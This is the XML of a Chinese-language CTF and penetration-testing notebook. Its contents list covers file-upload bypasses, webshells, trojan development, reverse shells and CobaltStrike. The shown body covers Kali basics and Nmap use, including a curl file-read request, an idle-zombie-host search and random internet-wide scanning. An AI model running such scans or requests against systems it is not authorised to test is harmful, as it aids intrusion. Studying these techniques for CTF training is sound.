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928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bookmarkStart w:id="106" w:name="_GoBack"/>
          <w:bookmarkEnd w:id="106"/>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">TOC \o "1-4"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_Toc20218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AWD</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20218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_Toc23879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一. Kali</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23879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_Toc18110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二. Nmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18110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_Toc32433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三. Zenmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32433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_Toc9604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四. Burp Suite</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9604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_Toc506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1.代理设置</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc506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2.爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc759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_Toc24918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3.配合AntSword（中国蚁剑）文件上传</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24918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（一）文件类型验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29930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_Toc30218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（二）内容验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30218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 后缀名验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10051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_Toc32056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 空字节截断目录路径</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32056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_Toc26669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 上传路径验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26669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_Toc9153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六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</w:rPr>
            <w:t>.htaccess文件绕过检测</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9153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_Toc29403 </w:instrText>
          </w:r>
          <w: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七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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>权限限制绕过</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29403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_Toc23169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 内容编码</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23169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_Toc21856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5. 请求格式转换</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21856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_Toc32058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五. Joomla</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32058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_Toc29301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六. Sqlmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29301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七. Java</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27099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_Toc26134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1.SQL注入</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26134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_Toc21262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2.命令执行漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21262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_Toc3166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（一）WSO2漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3166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_Toc12339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3.文件操作漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12339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_Toc9239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4.代码注入漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9239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_Toc32305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八. Python</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32305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_Toc4809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1.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>python安全应用编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4809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（一）正则表达式</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24509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_Toc15959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（二）Web编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15959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_Toc24854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（三）多线程(队列)</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24854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_Toc20583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（四）网络编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20583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_Toc569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2.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Burp Suite基于python插件开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc569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_Toc6696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（一）环境配置</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6696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（二）Burp Suite使用Python脚本</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1050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_Toc17207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（三）自定义Burp Suite插件名称</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17207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（四）自定义Burp Suite插件并引入到菜单项</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6260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（五）自定义Burp Suite插件获取cookies信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1198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（六）自定义Burp Suite插件使用官方文档提供方法</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20767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_Toc31136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（七）自定义Burp Suite插件完全删除所有相关项</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31136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（八）自定义Burp Suite插件获取HTTP请求信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21265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（九）自定义Burp Suite插件获取HTTP和HTTPS的Host、Port、Protocol</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6291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_Toc12919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（十）自定义Burp Suite插件使用本地字典爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12919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_Toc17853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（十一）自定义Burp Suite插件使用Python脚本处理过的本地字典内容爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17853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（十二） 自定义Web服务&amp;快速找出IP地址泄露</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18569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_Toc11261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3.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows基于python木马脚本开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11261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（一）简单输出程序及静默化</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6405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（二）截图程序</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15096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_Toc19569 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>4.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>python信息搜集工具开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19569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_Toc23229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（一）高精度字典生成</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23229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（二）指纹识别</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11678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_Toc10714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九. IDA</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10714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_Toc19452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1.基本操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19452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2.汇编指令</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc202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_Toc12725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3.ASCII码表</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12725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_Toc3617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十. 通防</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3617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_Toc21440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1.PWN</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21440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_Toc14573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2.PHP</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14573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_Toc21304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十一. Web代码审计</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21304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_Toc8979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1.PHP</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8979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_Toc8893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2.Python</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8893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_Toc13245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3.Java</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13245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_Toc30645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4.Nginx</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30645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十二. Diresearch</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4627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_Toc28315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十三. 一句话木马</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28315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_Toc31438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十四. 手写SQL注入</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31438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_Toc17089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1.json传参形式</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17089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_Toc28530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2.时间盲注脚本</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28530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十五. Redis</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15667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十六. Nuclei</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29734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十七. Xray</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23450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_Toc31111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十八. 端口监听反弹shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31111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_Toc30545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十九. CobaltStrike</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30545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二十. Web二进制</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14832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_Toc13835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1.JaveScript反混淆</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13835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_Toc19970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2.PHP扩展逆向</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19970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_Toc6328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lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>3.字节码恢复</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6328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_Toc6773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（一）Python</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6773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_Toc25232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（二）Java</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25232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_Toc2429 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">二十一. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Git_Extract</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2429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_Toc8551 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">二十二. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>NodeJS原型链污染以及模板注入漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8551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_Toc21575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二十三. 杂七杂八的东西</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21575 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>117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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc22508"/>
      <w:bookmarkStart w:id="1" w:name="_Toc20218"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AWD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/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" w:name="_Toc14106"/>
      <w:bookmarkStart w:id="3" w:name="_Toc23879"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="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更新指令apt-get update &amp;&amp; apt-get upgrade &amp;&amp; apt-get dist-upgrade 或者：sudo apt-get update &amp;&amp; sudo apt-get upgrade &amp;&amp; sudo apt-get dist-upgrade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更换到root用户（已知密码）su root 之后输入密码即可 （未知密码）首先sudo passwd之后输入密码kali，然后设置两次一样的新密码，然后su root之后输入新密码即可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2240" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="屏幕截图 2023-06-17 21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06-17 2118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自带的数据库启动，先切换到root用户，mysql -u root -p，之后弹出框输入默认密码为kali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3920" cy="3101340"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="99" name="图片 99" descr="屏幕截图 2023-07-03 22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3-07-03 223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读取文件指令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>curl -X POST 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-d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url=路径名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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="14605" b="11430"/>
            <wp:docPr id="1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全局搜flag内容指令（排除无权限内容）：grep -r flag{ / 2&gt;dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5044440" cy="541020"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="19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查看进程指令：ps -aux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="877570"/>
            <wp:effectExtent l="0" t="0" r="10160" b="11430"/>
            <wp:docPr id="2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打包根目录文件夹指令：tar -zcvf web.tar.gz ./*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下载文件指令：sz 文件名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="758825"/>
            <wp:effectExtent l="0" t="0" r="12065" b="3175"/>
            <wp:docPr id="2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打包指令(Windows也可使用)：tar -zcvf 压缩包名 压缩的文件1 压缩的文件2 ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2089150"/>
            <wp:effectExtent l="0" t="0" r="11430" b="6350"/>
            <wp:docPr id="2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计算字符串hash值：echo -n '字符串' | md5sum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" w:name="_Toc6171"/>
      <w:bookmarkStart w:id="5" w:name="_Toc18110"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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扫描：nmap IP地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3901440" cy="1478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端口及服务时根据规范表查询的，规范表在File System-usr-share-nmap文件夹里的nmap-service文件中，可以通过修改该规范表实现指定对照关系为规范查找</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLine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098675"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="12" name="图片 12" descr="屏幕截图 2023-06-18 1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06-18 1200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批量扫描端口1-30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3970020" cy="184404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扫描ip范围的所有端口，按回车会显示执行进度（Ping Scan Timing）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4640580" cy="29489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扫描文件中的IP范围nmap -iL list.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5036820" cy="294894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扫描出包括开启防火墙的端口nmap -F -P0 IP端口 --reason，这里-F是快速扫描（前100个高位端口），-P0实现带防火墙扫描，--reason显示扫描出来的原因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3000" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="5" name="图片 5" descr="屏幕截图 2023-06-17 2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06-17 2102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扫描端口号范围（最大范围1-65535）nmap -P l-65535 IP地址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6700" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="屏幕截图 2023-06-17 2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06-17 2230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寻找空闲主机（僵尸主机）nmap -p80 -open -script ipidseq ip端口范围（-open代表开放状态空闲主机，这里我没有空闲主机）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68140" cy="579120"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="屏幕截图 2023-06-17 22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06-17 2245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或者全网扫描nmap -p80 -open -script ipidseq -iR 2000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23460" cy="3025140"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="10" name="图片 10" descr="屏幕截图 2023-06-17 22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06-17 2254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如果说扫出来了空闲主机（显示ipidseq为Incremental的就可以）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860" cy="1082040"/>
